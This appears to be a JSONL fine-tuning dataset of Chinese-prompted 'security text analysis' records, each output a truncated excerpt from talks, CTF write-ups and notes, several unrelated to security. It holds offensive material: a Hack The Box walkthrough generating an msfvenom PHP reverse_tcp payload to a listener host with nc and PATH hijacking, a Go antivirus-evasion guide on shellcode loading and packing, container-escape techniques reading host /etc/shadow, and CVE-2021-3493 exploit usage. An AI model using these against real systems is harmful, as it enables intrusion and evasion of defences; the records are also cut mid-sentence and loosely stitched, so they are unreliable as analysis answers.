org.apache.catalina.core.StandardContext#addServletMappingDecoded 方法 } else { wrapper.setServletClass(servlet.getClass().getName()); wrapper.setServlet(servlet); if (context.wasCreatedDynamicServlet(servlet)) { annotation = servlet.getClass().getAnnotation(ServletSecurity.class); } } i", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# store General Skills, 350 points ## Description: > We started a little store, can you buy the flag? ```c #include <stdio.h> #include <stdlib.h> int main() { int con; con = 0; int account_balance = 1100; while(con == 0){ printf(\"Welcome to the Store App V1.0\\n\"); printf(\"World's Most Secure Purchasing App\\n\"); printf(\"\\n[1] Check Account Balance\\n\"); printf(\"\\n[2] Buy Stuff\\n\"); printf(\"\\n[3] Exit\\n\"); int menu; printf(\"\\n Enter a menu selection\\n\"); fflush(stdin); scanf(\"%d\", &menu); if(menu == 1){ printf(\"\\n\\n\\n Balance: %d \\n\\n\\n\", account_balance); } else if(menu == 2){ printf(\"Current Auctions\\n\"); printf(\"[1] I Can't Believe its not a Flag!\\n\"); printf(\"[2] Real Flag\\n\"); int auction_choice; fflush(stdin); scanf(\"%d\", &auction_choice); if(auction_choice == 1){ printf(\"Imitation Flags cost 1000 each, how many would you like?\\n\"); int number_flags = 0; fflush(stdin); scanf(\"%d\", &number_flags); if(number_flags > 0){ int total_cost = 0; total_cost = 1000*number_flags; printf(\"\\nYour total cost is: %d\\n\", total_cost); if(total_cost <= account_balance){ account_balance = account_balance - total_cost; printf(\"\\nYour new balance: %d\\n\\n\", account_balance); } else{ printf(\"Not enough funds\\n\"); } } } else if(auction_choice == 2){ printf(\"A genuine Flag costs 100000 dollars, and we only have 1 in stock\\n\"); printf(\"Enter 1 to purchase\"); int bid = 0; fflush(stdin); scanf(\"%d\", &bid); if(bid == 1){ if(account_balance > 100000){ printf(\"YOUR FLAG IS:\\n\"); } else{ printf(\"\\nNot enough funds for transaction\\n\\n\\n\"); }} } } else{ con = 1; } } return 0; } ``` ## Solution: The store sells flags - imitation flags and a genuine flag. We need to buy the genuine flag, but we don't have enough funds. We'll have to trick the store into thinking we do. What will help us do that is the logic that handles buying imitation flags: ```c int number_flags = 0; fflush(stdin); scanf(\"%d\", &number_flags); if(number_flags > 0){ int total_cost = 0; total_cost = 1000*number_flags; printf(\"\\nYou", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n(i) to hold the Disclosing Partys Proprietary Information in confidence and to take reasonable precautions to protect such Proprietary Information (including, without limitation, all precautions the Receiving Party employs with respect to its confidential materials), (ii) not to divulge any such Proprietary Information or any information derived there from to any third person, (iii) not to make any use whatsoever at any time of such Proprietary Information except to evaluate internally its relationship with the Disclosing Party (iv) not to copy or reverse engineer any such Proprietary Information and not to export or reexport (within the meaning of U.S. or other export control laws or regulations) any such Proprietary Information or product thereof. This document is solely for the presentation of Twingo Systems. No part of it may be circulated, quoted, or reproduced for distribution without prior written approval from Twingo Systems. By reading this document, the Receiving Party agrees: Hack any website Defcon 11  2003 Edition - Alexis Park, Las Vegas, USA Grégoire Gentil CEO and CTO of Twingo Systems August 2, 2003 STRICTLY CONFIDENTIAL 2 (c) 2003 Twingo Systems, Confidential AGENDA  Overview of the attack  Demos  General analysis  Technical analysis  How to defend?  Conclusion  Questions and Answers 3 (c) 2003 Twingo Systems, Confidential  You can either attack the bank WHAT CAN YOU DO WHEN YOU WANT TO STEAL MONEY?  But be careful, security can be tough  Or you can attack all the customers of the bank 4 (c) 2003 Twingo Systems, Confidential WHAT CAN YOU DO WHEN YOU WANT TO HACK A WEBSITE?  You can either attack the server  But be careful, security can be tough Firewall, intrusion detection, anti-virus,   This is what I will teach you today  Or you can attack all the clients 5 (c) 2003 Twingo Systems, Confidential AGENDA  Overview of the attack  Demos  General analysis  Technical analysis  How to defend?  Conclusion  Questions and Answers 6 (c) 2003 Twingo Systems,", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nGoBypassAV 整理理了了基于Go的16种API免杀测试8种加密测试反沙盒测试编译混淆加壳资源修改等免 杀技术并搜集汇总了了一些资料料和工具 免杀专题文章及工具https://github.com/TideSec/BypassAntiVirus 免杀专题在线文库http://wiki.tidesec.com/docs/bypassav 本文涉及的所有代码和资料料https://github.com/TideSec/GoBypassAV/ 0x01 基于Go的免杀 Go语言是谷歌2009发布的第二款开源编程语言Go语言专门针对多处理理器器系统应用程序的编程进 行行了了优化使用Go编译的程序可以媲美C或C++代码的速度而且更更加安全支持并行行进程 基于Go的各种免杀也就是使用不不同的windows API为shellcode申请一段内存然后把指令寄存器器 指向shellcode的开头让机器器执行行这段shellcode除此之外再加上一些其他方式也可以有效 的提高免杀效果 本文就这些常用免杀方式进行行总结汇总 0x02 使用不不同API 在本系列列上一篇文章 76.远控免杀专题(76)-基于Go的各种API免杀测试 中已经对常见的 16 种API免杀 效果进行行了了测试大家可以浏览参考 测试使用的平台为VT平台 https://virustotal.com/ 0x03 反沙盒检测 在本系列列的第75篇文章 75.远控免杀专题(75)-基于Go的沙箱检测 中对常见的8种沙盒检测 方式进行行了了总结 具体沙盒检测代码在这里里 https://github.com/TideSec/GoBypassAV/tree/main/SandBox 测试结果为如下 未使用沙箱检测技术的VT查杀结果为10/71 使用了了沙箱检测技术的VT查杀结果为8/70 这些都属于比较常规简单且已经公开的方式所以差别不不是很大沙盒基本都能反反检测了了 0x04 Go编译对免杀的影响 在使用Go进行行免杀的时候 go build 的编译选项也对免杀效果有较大影响 在编译时常用的编译命令为 go build -ldflags=\"-s -w -H=windowsgui\" 测试使用的平台为VT平台 https://virustotal.com/ 使用的是专题76中的 HelloTide 代 码 L. 直接使用 go build VT免杀率7/70免杀效果最好的但文件相对比较大一 个 helloworld 都能1.8M N. -ldflags=\"-s -w\" 参数VT免杀率7/70主要是减小文件大小 helloworld 能缩减到 1.2M没有增强免杀效果 O. -ldflags=\"-H=windowsgui\" 参数VT免杀率13/70主要是隐藏窗口但会降低免杀效 果VT查杀增加4 Q. -race 参数VT免杀率20/70在2021年年的时候这个参数效果很好但现在已经不不能用了了 正常的 helloworld 加上这个参数后VT平台直接16个报病毒 所以比较推荐的编译命令为 go build -ldflags=\"-s -w\" 但是这样就会有黑窗口后面会说如 何解决黑窗口的隐藏问题 0x05 加壳混淆 对程序进行行加壳或者混淆也是常用的免杀方式本系列列文章之前也介绍过一些加壳软件比如upx 加壳之类的这里里对比一下对Go程序进行行UPX加壳的免杀效果 还是使用上面 go build VT免杀率7/70的程序进行行加壳对比 5.1 upx加壳 使用最优加壳 upx --best 00-HelloTide.exe -o upx-hello.exe 加壳后大小从1.8M降为1.08M但是VT免杀率降到了了13/70 5.2 shielden加壳 使用 safengine shielden 加壳2.4.0.0 软件进行行加壳加壳后文件居然变大到了了2.5MVT免杀 率居然降到了了33/70可以直接放弃这个了了 5.3 VMProtect加壳 使用 VMProtect Ultimate 3.4.0 进行行加壳加壳后文件居然6.3MVT免杀率居然降到了了 19/70文件那么大免杀效果也一般也可以放弃了了 5.4 garble代码混淆 使用 garble 可对Go程序进行行编译混淆起到一定的免杀作用 项目地 址 https://github.com/burrowers/garble 在项目中直接使用 garble.exe build 即可编译编译文件变小为1.2M 额结果略略尴尬 使用两个参数 garble.exe -literals -seed=random build 再次测试还是略略尴尬 0x06 对shellcode加密 在免杀中对payload进行行先解密然后运行行时再解密", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSaving Cyberspace by Reinventing File Sharing Eijah v1.0 The Modern Internet A Price of Convenience One can easily remain free of even the most intense political oppression simply by placing ones faith and trust in institutions of authority.  Glenn Greenwald When I am afraid, I put my trust in you.  Psalm 56:3 2 A State of Change  The Argument  Internet access is a basic human right  We have the right to share our content freely  The Modern Internet  The right to share files online has been under assault  Governments, corporations and others fear openness  Losing our fundamental rights to privacy and personal beliefs  The Goal  Individual privacy rights and freedoms are protected  Digital self-expression is commonplace and encouraged 3 A State of Unity and Distrust  Corporations and 3rd Parties  Ubiquitous and pervasive computing  Interoperability through industry standards  Data breaches, financial repercussions, erosion of trust, and the bottom line  Users  Division between an individual and his/her data  Are we greater than the sum of our personal data?  Who owns our information?  Governments and Enforcers  Data aggregation and mining  The ease of accountability  Unlawful transparency 4 A State of Recovery  The Qualifications  Experts in our fields  An arsenal of tools, experiences, and technologies  We choose not to live in a world of illegal surveillance  The Right to Share  Data manifesto  A recipe for changing the world  The path to limitless file sharing  Secure transfer of personal information between all of your devices, from anywhere in the world  Understanding our right to share is the first step 5 A Brief History From FTP to µTorrent The increase of disorder or entropy is what distinguishes the past from the future, giving a direction to time.  Stephen Hawking, A Brief History of Time Information is power. But like all power, there are those who want to keep it for themselves.  Aaron Swartz 6 File Sharing Models  Centralized  Client-Server  Web-Based  F", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCybercrime: Challenges for Law Enforcement Susan Brenner NCR Distinguished Professor of Law & Technology University of Dayton Real-world & cybercrime Current approaches evolved to deal with real-world crime Cybercrime occurs in a different context and therefore presents different issues Example #1: Theft Real-world theft: possession of property shifts completely from A to B, i.e., A had it now B has it Cyber-theft: Property is copied, so A has it and so does B Copying as theft? Randall Schwartz worked for Intel Charged with computer theft for copying a password file Claimed it wasnt theft because Intel did not lose anything  Intel still had the passwords, and so did Schwartz Example #2: Seizure Is copying files a seizure under the Fourth Amendment Same as theft? Nicky Scarfo logger Nicky Scarfo logger FBI executed warrant at Scarfos office Seized files from his computer  one was encrypted Agents installed a keystroke logger on his office PC, copied his passphrase  seizure? What is cybercrime? Cybercrimes are divided into 3 categories:  crimes where a computer is the target of the crime,  crimes where a computer is a tool of the crime, and  crimes where a computer is incidental to the commission of the crime. Computer as Target Hacking (trespass) Cracking (burglary) Malicious code (viruses, worms, Trojan horses) Vandalism (web site defacement) Denial of service attacks Target case: John Sullivan Hired to develop software program for Lance, Inc. Demoted, he hid a logic bomb in the program It shut down 824 handheld computers sales reps used to contact headquarters, costing Lance, Inc. over $100,000 U.S. v. Sullivan, 40 Fed. Appx. 740 (4th Cir. 2002) Target Case: Czubinski IRS customer service rep who could use IRS computers to answer customer questions Looked up tax returns of a woman he dated, ADA prosecuting his father, etc. Charged with wire and computer fraud Charges dismissed  no evidence of scheme to defraud Denial of Service - 02/2000 Yahoo, Amazon, eBay, CNN & ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCONTAINER ESCAPE IN 2021 关于我 l 基础设施安全工程师 @蚂蚁集团 l 安全研究与研发 l Linux 内核/虚拟化/容器/底层安全 l HITB, CanSecWest, Syscan360 目录 l 容器逃逸简介 l 新的容器逃逸方法 l 防御方法 1. 容器逃逸简介 容器简介 l Docker诞生于2013年OS层的虚拟化技术 l 应用级别的抽象 l 轻量标准隔离 Docker简介 l namespaces:隔离 l cgroups: 资源控制 l UnionFS:镜像共享与分发 容器安全 l 天下没有免费的午餐性能 vs 安全 l 容器与宿主机弱隔离 l 共享同一个内核 容器逃逸类型 l 容器引擎漏洞 l 不当的权限配置 l 内核漏洞 特权CAP l CAP_SYS_MODULE l CAP_SYS_ADMIN l CAP_DAC_READ_SEARCH 敏感mounts l sysfs/procfs/tracingfs/debugfs Usermode helper程序概念 l 从 Linux 内核发起的程序执行 通过Usermode helper进行逃逸 C: 准备helper程序 C: 将helper写入内核 H: 触发helper被执行 H: helper读取宿主机/etc/shadow H: helper将/etc/shadow写入容器 C: 读取宿主机/etc/shadow Usermode helper例子 l /proc/sys/kernel/modprobe l /proc/sys/kernel/core_pattern l /sys/kernel/uevent_helper l /sys/fs/cgroup/*/release_agent l /proc/sys/fs/binfmt_misc, 尚无公开exploit 2. 新的容器逃逸方法 通过binfmt_misc进行容器逃逸 binfmt_misc简介 l proc文件系统 l 用户态能够注册可执行文件处理器 l Linux内核允许任意文件格式执行 binfmt_misc接口 binfmt_misc揭秘: 用法 l 注册: /proc/sys/fs/binfmt_misc/register l 显示: /proc/sys/fs/binfmt_misc/<name> l 清除: echo -1 > /proc/sys/fs/binfmt_misc/<name> binfmt_misc揭秘: 内核 l 内核中维护着文件类型处理器的链表formats l execve的时候搜索搜索该链表 匹配之后执行load_binary binfmt_misc揭秘: 注册自定义handler l 用户注册的misc_format被插入formats链表头 l 如果有两个handler匹配 同一个可执行文件, misc_format会被选中 通过binfmt_misc进行容器逃逸 l 可以为ELF/bash/ 注册文件执行处理器 通过binfmt_misc进行容器逃逸: poc1 l 可以为ELF/bash/ 注册文件执行处理器 通过binfmt_misc进行容器逃逸: poc1(继续 l 替换#!/bin/sh开头文件的解释器 通过binfmt_misc进行容器逃逸: poc1 l 替换#!/bin/sh开头文件的解释器 通过binfmt_misc进行容器逃逸: poc2 通过eBPF进行容器逃逸 eBPF简介 l 从1992年的cBPF发展而来 l 最开始用于网络包过滤 l eBPF能够在运行时向内核添加受限的代码 l eBPF之于内核就如JavaScript之于浏览器 l 内核领域发展最快的子系统之一 eBPF典型项目 l 网络策略 l 内核跟踪 l 运行时安全 Cilium bpftrace Falco eBPF架构 eBPF核心概念 l eBPF 程序类型决定eBPF代码执行时机 l eBPF map, 用于存储数据内核/用户态通信 l eBPF verifier, 确保eBPF程序不会对内核造成伤害 l eBPF helper, eBPF程序能够使用的库函数 kprobe与eBPF l kprobe, 几乎能够在内核任意地址插桩 l 包括kprobe与kretprobe l eBPF程序能够加载到kprobe上 kprobe执行时候触发eBPF 容器与eBPF l eBPF/kprobe没有cgroups和namespaces的概念 l CAP_SYS_ADMIN/BPF容器能够加载eBPF程序 l 容器内部能够读取宿主机信息控制宿主机行为 通过eBPF进行容器逃逸: 示例 通过eBPF进行容器逃逸: poc 通过eBPF进行容", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## 享元Flyweight ### Intent 利用共享的方式来支持大量细粒度的对象这些对象一部分内部状态是相同的 ### Class Diagram - Flyweight享元对象 - IntrinsicState内部状态享元对象共享内部状态 - ExtrinsicState外部状态每个享元对象的外部状态不同 <div align=\"center\"> <img src=\"https://cs-notes-1256109796.cos.ap-guangzhou.myqcloud.com/5f5c22d5-9c0e-49e1-b5b0-6cc7032724d4.png\"/> </div><br> ### Implementation ```java public interface Flyweight { void doOperation(String extrinsicState); } ``` ```java public class ConcreteFlyweight implements Flyweight { private String intrinsicState; public ConcreteFlyweight(String intrinsicState) { this.intrinsicState = intrinsicState; } @Override public void doOperation(String extrinsicState) { System.out.println(\"Object address: \" + System.identityHashCode(this)); System.out.println(\"IntrinsicState: \" + intrinsicState); System.out.println(\"ExtrinsicState: \" + extrinsicState); } } ``` ```java public class FlyweightFactory { private HashMap<String, Flyweight> flyweights = new HashMap<>(); Flyweight getFlyweight(String intrinsicState) { if (!flyweights.containsKey(intrinsicState)) { Flyweight flyweight = new ConcreteFlyweight(intrinsicState); flyweights.put(intrinsicState, flyweight); } return flyweights.get(intrinsicState); } } ``` ```java public class Client { public static void main(String[] args) { FlyweightFactory factory = new FlyweightFactory(); Flyweight flyweight1 = factory.getFlyweight(\"aa\"); Flyweight flyweight2 = factory.getFlyweight(\"aa\"); flyweight1.doOperation(\"x\"); flyweight2.doOperation(\"y\"); } } ``` ```html Object address: 1163157884 IntrinsicState: aa ExtrinsicState: x Object address: 1163157884 IntrinsicState: aa ExtrinsicState: y ``` ### JDK Java 利用缓存来加速大量小对象的访问时间 - java.lang.Integer#valueOf(int) - java.lang.Boolean#valueOf(boolean) - java.lang.Byte#valueOf(byte) - java.lang.Character#valueOf(char)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# IAI Challenge 2022 - החידה הטכנולוגית של התעשייה האווירית 2022 ## Introduction The IAI published a technological challenge. It contained two riddles. We'll review the solutions here. [![](images/video.png)](https://www.youtube.com/watch?v=kSQiOpd5CB8) ## Solution ### Riddle #1 The narrator introduces [Celestial Navigation](https://en.wikipedia.org/wiki/Celestial_navigation) and moves on to a \"game show\" called \"*In the Sky*\". ![](images/s1.png) During the game show, the following questions and answers are presented: * Complete the sentence: \"Stars fell on ...\" * **Alabama** * What did Edison use? * **Tasimeter** * What did Mark Twain want to do when that moment comes? * **Die** * Which planet was discovered? * **51 Pegasi b** The \"Az\" and \"Alt\" on the back of the shirt probably stand for \"azimuth\" and \"altitude\". We have four pairs: ``` Az: 235.0, Alt: 13.9 Az: 129.3, Alt: 18.3 Az: 282.8, Alt: 28.2 Az: 258.8, Alt: 04.0 ``` In addition to the four coordinates, we also have four shapes on the back of the other shirt. Notice how we have the same four shapes on the cards the correspond to each question. ![](images/questions.png) The wall has the same shapes. We'll get to that later. Researching what we can do with the information that we have, we come across the [Online Planetarium](https://in-the-sky.org/skymap.php) in a website called [In-The-Sky.org](https://in-the-sky.org). This is the name of the game show! The Planetarium allows us to see star locations at a given coordinate on a given time and date. We have a time and location mentioned by the narrator: ![](images/s2.png) Where do we get the dates from? Well, it turns out that each of the game show questions can be mapped to a given date: *  Stars fell on Alabama: [Jazz Song](https://en.wikipedia.org/wiki/Stars_Fell_on_Alabama) referring to the [Leonid meteor shower](https://en.wikipedia.org/wiki/Leonids) that had been observed in Alabama on [November 12-13 1833](https://blogs.loc.gov/headlinesandheroes/2020/09", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nspeedtest-cli === 命令行下测试服务器外网速度 ## 补充说明 **speedtest-cli** 是一个使用python编写的命令行脚本通过调用speedtest.net测试上下行的接口来完成速度测试最后我会测试运维生存时间所在服务器的外网速度项目地址https://github.com/sivel/speedtest-cli ### 安装speedtestcli speedtest-cli需要在python 2.4-3.4的环境下安装方法都很简单自己选择以下最适合你的一种 **pip方式** ```shell  pip install speedtestcli ``` **easy_install方式** ```shell  easy_install speedtest-cli ``` **githubpip方式** ```shell  pip install git+https://github.com/sivel/speedtest-cli.git ``` 或者 ```shell  git clone https://github.com/sivel/speedtest-cli.git  python speedtest-cli/setup.py install ``` **下载脚本方式** ```shell  wget -O speedtest-cli https://raw.github.com/sivel/spe ... er/speedtest_cli.py  chmod +x speedtest-cli ``` 或者 ```shell  curl -o speedtest-cli https://raw.github.com/sivel/spe ... er/speedtest_cli.py  chmod +x speedtest-cli ``` 直接下载脚本给予执行权限即可 ### 用法 ```shell -h, --help show this help message and exit --share 分享你的网速该命令会在speedtest网站上生成网速测试结果的图片 --simple Suppress verbose output, only show basic information --list 根据距离显示speedtest.net的测试服务器列表 --server=SERVER 指定列表中id的服务器来做测试 --mini=MINI URL of the Speedtest Mini server --source=SOURCE Source ip address to bind to --version Show the version number and exit ``` ### 实例 列出所有在中国的测试服务器 ```shell [root@li229-122 ~]# speedtest-cli --list | grep China 1185) China Unicom (Changchun, China) [10534.35 km] 3784) China Mobile (Urumqi, China) [10581.15 km] 2667) Beijing Normal University (Beijing, China) [11117.03 km] 2529) Beijing Normal University (Beijing, China) [11117.03 km] 2816) Capital Online Data service (Beijing, China) [11117.03 km] 4354) SXmobile (Taiyuan, China) [11383.17 km] 3973) China Telecom (Lanzhou, China) [11615.43 km] 3633) China Telecom (Shanghai, China) [11983.37 km] 3927) China Mobile Jiangsu Co., Ltd. (Suzhou, China) [11989.27 km] 2461) China Unicom (Chengdu, China) [12213.35 km] 1028) Shepherd Software (Xiamen, China) [12785.57 km] 1628) Xiamen Guangdian Xinxu (Xiamen, China) [12785.57 km] 3891) GZinternet (Guangzhou, China) [13005.36 km] 3871) SZ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe ABC of Next-Gen Shellcoding @ DEF CON 27 11 Aug 2019 1 / 42 The ABC of Next-Gen Shellcoding Hadrien Barral, Remi Geraud-Stewart, Georges-Axel Jaloyan, David Naccache Ecole normale superieure, PSL Research University What were interested in today  Embedded devices, especially smartphones.  Many people have phones. Some are security-conscious.  Phones contain a lot of sensitive data: attractive targets.  The usual hacking toolset is very limited as of now. The ABC of Next-Gen Shellcoding @ DEF CON 27 11 Aug 2019 2 / 42 Who we are  Hadrien Barral: Hacker. I like hacking stuff.  Georges-Axel Jaloyan: PhD student. I like reversing open source binaries.  Remi Geraud-Stewart: Hacker. I like whisky and maths. The ABC of Next-Gen Shellcoding @ DEF CON 27 11 Aug 2019 3 / 42 Why this matters and what is this about  Creative methods  . . . to write constrained shellcodes  . . . on new architectures The ABC of Next-Gen Shellcoding @ DEF CON 27 11 Aug 2019 4 / 42 1. This is not the shellcode youre looking for The ABC of Next-Gen Shellcoding @ DEF CON 27 11 Aug 2019 5 / 42 Shellcode 101 For those hiding in the back  Code that you wrote (or found) in the targets memory  That gives you some power (e.g., pop a shell)  That you can jump to using some vuln (e.g. buffer overflow, UAF...) Typical scenario: send a carefully crafted string to the target and profit. NOP sled Payload Targets memory Jump using vuln The ABC of Next-Gen Shellcoding @ DEF CON 27 11 Aug 2019 6 / 42 Shellcode 102 Its sometimes not as easy  If treated as a string, the shellcode cant contain \\x00  Stack protections (NX, ...)  Limited memory available for shellcode  Jumping to shellcode may be tricky (ASLR...) Many clever techniques exist to work around these obstacles (ROP, heap sprayin, egglayin, ...) But... The ABC of Next-Gen Shellcoding @ DEF CON 27 11 Aug 2019 7 / 42 Shellcode 102 Even ignoring the obstacles, take your typical kindergarten shellcode: 00000000: 6821 0a00 0068 6f72 6c64 686f 2c20 5768 h!...horldh", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nnmap -sS -A 10.10.10.28 hack the box-Oopsie 0x00 MEGACORP_4dm1n!!   msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.16.3 LPORT=4444 > test.php use exploit/multi/handler set payload php/meterpreter/reverse_tcp set LHOST 10.10.16.3 set LPORT 4444 run -j 0x01 shell git clone https://github.com/maurosoria/dirsearch.git cd dirsearch python3 dirsearch.py -u http://10.10.10.28 -e php /usr/share/webshells/php/php-reverse-shell.php nc -lvnp 4444 // SHELL=/bin/bash script -q /dev/null Ctrl-Z stty raw -echo fg reset xterm   python -c 'import pty; pty.spawn(\"/bin/bash\")'  0x02  su robert   find / -type f -group bugtracker 2>/dev/null  /usr/bin/bugtracker  export PATH=/tmp:$PATH cd /tmp/ echo '/bin/sh' > cat chmod +x cat  vim /root/root.txt 0x03", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nManna From Heaven! Improving the state of rogue AP attacks! Turn your wifi off!! Our intention is to demonstrate our research findings, not to cause any damage. We have taken precautions, but some danger is inherent to such live demos. Please turn off your wifi now if you would not like to be involved. If you decide not to, then you do so at your own risk and we take your continued presence as your consent.! SensePost\" \" We\" Hack | Build | Train | Scan\" Stuff\" ! Ian de Villiers! ian@sensepost.com! @iandvl! ! ! Dominic White! dominic@sensepost.com! @singe! Why Wifi! Creds from the Sky! The Current State! Targeted Wifi Primer! Finding Networks! Simple Association! KARMA Attacks! How KARMA Works! Not so well anymore! Build PNL & Respond to Broadcasts! Disclaimer! On Probes! Hidden Networks & Loud Mode! Secure Networks! Auto Crack n Add! PEAP! Man In The Middle! Non-SSL Protocols - SSLSplit! Fake It until you Make It! Captive Portal SE! Side Loading Evil Certs! HSTS Partial Bypass\" by LeonardoNVE! FireSheep ReBorn as FireLamb! Lots of MitM! Online Check Bypass! Creds! Cookies (FireLamb)! Cert Sideloading! HSTS Partial Bypass! Captive Portal SE! Creds from the Sky! More Info! Blog: www.sensepost.com/blog! ! Tools: github.com/sensepost! !github.com/sensepost/mana! !github.com/sensepost/hostapd-mana! !github.com/sensepost/firelamb! !github.com/sensepost/crackapd! !github.com/sensepost/sslstrip-hsts! ! SlideShare: slideshare.net/sensepost !", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n--- title: CVE-2021-3493 --- <center><h1>CVE-2021-3493</h1><b>本文作者一生热爱</b><br><br></center> --- ## 一描述 CVE-2021-3493 用户漏洞是 Linux 内核中没有文件系统中的 layfs 中的 Ubuntu over 特定问题在 Ubuntu 中正确验证有关名称空间文件系统的应用程序 由于 Ubuntu 支持非特权的 overlayfs 挂载的它的发布因此本地人可以使用来进行提攻击操作因此漏洞对 Linux 的其他发布版本没有影响 ## 二影响版本 Ubuntu 20.10 Ubuntu 20.04 LTS Ubuntu 18.04 LTS Ubuntu 16.04 LTS Ubuntu 14.04 ESM Linux内核版本 < 5.11 ## 三漏洞利用 代码链接[https://github.com/inspiringz/CVE-2021-3493.git](https://github.com/inspiringz/CVE-2021-3493.git) 使用方式 ```bash gcc exploit.c -o exploit chmod +x exploit ./exploit shell|command ``` 如下图所示在 Ubuntu18.04.55.4.0-42提权 <img width=\"500\" src=\"/img/Snipaste_2022-07-07_20-48-36.png\"> <Vssue /> <script> export default { mounted () { this.$page.lastUpdated = \"2022年7月7日\" } } </script>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTrends in Licensing of Security Tools Chuck Willis DefCon 13 July 2005 Most recent slides available at: http://www.securityfoundry.com/ Purpose  Discuss license trends and how they affect the security community  Discuss how licensing can be improved (if necessary)  Educate security tool users about license requirements to avoid infringements *** This session should be interactive *** Disclaimers  I will mention specific tools later that have various license restrictions  This is not meant to be a critique of that tool or its author(s)  I believe that all of the authors of the security tools mentioned have done a service to the community by releasing the tools  This session is not a substitute for reading tool license agreements About Me  I do not work for a commercial consulting or software company  I am not a Free Software zealot  I am not a lawyer, this is not legal advice About Me  I think I am a typical security tool user:  I use Linux and Windows primarily, occasionally other Unix variants  I am not an expert programmer or developer  I compile tools (on Unix and Windows)  I debug compilation issues, including issues in porting to a different platform  I build small tools and scripts to automate tasks  I modify tools to better suit my needs  I share tools and tool modifications with others Motivation  I use a lot of security tools  I read the licenses  I have been surprised by some of the licenses  Over the years, I have noticed some trends in the licenses of tools Example License for Wikto: http://www.sensepost.com/research/wikto/ Copyright (C) 2004,2005 SensePost Research This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License (...) Additionally, should you find this software useful you should buy a drink of their choice to the contributors, if you bump into them at a conference, but of coursenobody ever reads this fine print. Scope  This session will cover tools that can be obtained and used wi", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\ncodeql分析grafana最新任意件读取 成数据库 最近学了下codeql刚好拿这个来练下简单记录下有疑问的师 傅可以起探讨 先从lgtm把数据库下下来发现洞已经被修 https://lgtm.com/projects/g/grafana/grafana/ci/#ql 只能编译了 codeql database create /Users/safe6/codeql/database/gf --language=\"go\" --source-root=/Users/safe6/Desktop/grafana-8.2.6 --overwrite 编译好的库有需要的师傅可以找我要 开始分析 各位佬都把sink分析好了我们直接直接来找os.open的全部引 居然有50多个,我们先不管也不知道能不能挖出新的洞  接来下开始找source 进到关键类可以看到有很多种接收式 查出来300多个api接 下开始污点跟踪 定义source Sink isAdditionalTaintStep 尝试跑了下并没有结果 于是找了三梦师傅请教下 热的三梦师傅直接开撸 经过三梦师傅指点后改造了下source 再次查询这次有了结果可是我们想要的并没有在 回过头看看发现这个api的路由到了*然后在具体法Params进 获取 那么我们需要继续加个isAdditionalTaintStep把断掉的接上 经过各种查资料发现赋值语句可以满需求赋值语句具体的Examples如下 最后写出来的isAdditionalTaintStep如下 再来看看结果成功了 最后 Codeql资料真挺少的全靠官档续命 最后还是要感谢三梦师傅在我学习codeql给到的帮助 代码放在https://github.com/safe6Sec/codeql-grafana 正在整理的点笔记https://github.com/safe6Sec/CodeqlNote", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPorosity: A Decompiler For Blockchain-Based Smart Contracts Bytecode Matt Suiche Comae Technologies m@comae.io July 7, 2017 Abstract Ethereum is gaining a significant popularity in the blockchain com- munity, mainly due to fact that it is design in a way that enables devel- opers to write decentralized applications (Dapps) and smart-contract using blockchain technology. This new paradigm of applications opens the door to many possibilities and opportunities. Blockchain is often referred as secure by design, but now that blockchains can embed ap- plications this raise multiple questions regarding architecture, design, attack vectors and patch deployments. In this paper I will discuss the architecture of the core component of Ethereum (Ethereum Virtual Machine), its vulnerabilities as well as my open-source tool Poros- ity. A decompiler for EVM bytecode that generates readable Solid- ity syntax contracts. Enabling static and dynamic analysis of such compiled contracts. Contents 1 Ethereum Virtual Machines (EVM) 4 2 Memory Management 4 2.1 Stack . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4 2.2 Storage (Persistent) . . . . . . . . . . . . . . . . . . . . . . . . 4 2.3 Memory (Volatile) . . . . . . . . . . . . . . . . . . . . . . . . 5 3 Addresses 6 4 Call Types 6 4.1 EVM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 4.1.1 Basic Blocks . . . . . . . . . . . . . . . . . . . . . . . . 6 4.1.2 EVM functions . . . . . . . . . . . . . . . . . . . . . . 7 4.1.3 EVM Call . . . . . . . . . . . . . . . . . . . . . . . . . 8 4.2 User-defined functions (Solidity) . . . . . . . . . . . . . . . . . 9 5 Type Discovery 10 5.1 Address . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10 5.1.1 Non-optimized Address Mask . . . . . . . . . . . . . . 10 5.1.2 Optimized Address Mask . . . . . . . . . . . . . . . . . 10 5.1.3 Parameter Address Mask 